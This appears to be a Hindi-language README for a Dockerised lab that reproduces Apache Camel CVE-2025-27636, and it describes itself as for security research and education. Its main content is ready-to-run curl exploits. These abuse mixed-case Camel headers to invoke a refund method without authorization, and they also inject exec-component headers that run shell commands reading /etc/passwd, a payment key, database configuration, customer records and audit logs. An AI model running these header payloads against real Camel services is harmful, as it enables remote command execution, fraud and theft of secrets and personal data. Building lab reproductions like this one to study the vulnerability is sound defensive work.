
Apache Camel CVE-2025-27636 का प्रदर्शन, Docker-आधारित हेडर इंजेक्शन हमलों के पुनरुत्पादन के साथ, जिसमें बीन मेथड इंजेक्शन और कमांड निष्पादन शामिल है, सुरक्षा अनुसंधान और शिक्षा के लिए।
यह प्रोजेक्ट Apache Camel में हेडर इंजेक्शन हमलों से संबंधित सुरक्षा कमजोरियों को प्रदर्शित करता है।
Docker इमेज बनाएं:
docker build -t camel-cve-demo .
सभी आवश्यक पोर्ट के साथ कंटेनर चलाएं:
docker run -d `
--name camel-cve-demo `
-p 8080:8080 `
-p 8081:8081 `
-p 8484:8484 `
-v ${PWD}/logs:/app/logs `
-e JAVA_OPTS="-Xmx512m -Xms256m" `
camel-cve-demo
मेथड नाम इंजेक्ट करके कमजोर एंडपॉइंट का शोषण करें:
# सफल हमला - केस-सेंसिटिव हेडर
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "cAmelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"
# वैकल्पिक - क्वेरी पैरामीटर इंजेक्शन
curl.exe "http://localhost:8081/api/payment/callback?cAmelBeanMethodName=processRefund" -X POST -d "order_id=ORD999&amount=9999.99"
तुलना (ये विफल होने चाहिए):
# गलत केस - काम नहीं करना चाहिए
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "camelbeanmethodname: processRefund" -d "order_id=ORD999&amount=9999.99"
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "CamelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"
मनमाने कमांड निष्पादित करने के लिए exec कंपोनेंट का शोषण करें:
टोही:
# वर्तमान निर्देशिका जांचें
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c pwd"
# कॉन्फ़िग निर्देशिका सूचीबद्ध करें
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c ls -la /app/config/"
# कॉन्फ़िगरेशन फ़ाइलें खोजें
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c find / -name database.conf 2>/dev/null"
डेटा बहिष्करण:
# डेटाबेस कॉन्फ़िगरेशन पढ़ें
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /etc/app/config/database.conf"
# भुगतान रहस्य पढ़ें
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /app/secrets/payment.key"
# ग्राहक डेटा पढ़ें
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/var/data/customers/customers.csv"
# ऑडिट लॉग पढ़ें
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/var/log/audit/audit.log"
# सिस्टम उपयोगकर्ता पढ़ें
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/etc/passwd"
# प्रक्रियाएं सूचीबद्ध करें
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: ps" -H "cAmelExecCommandArgs:aux"
कंटेनर के अंदर हमले के लॉग जांचें:
# अनधिकृत रिफंड प्रयास देखें
docker exec camel-cve-demo cat /tmp/unauthorized_refund.txt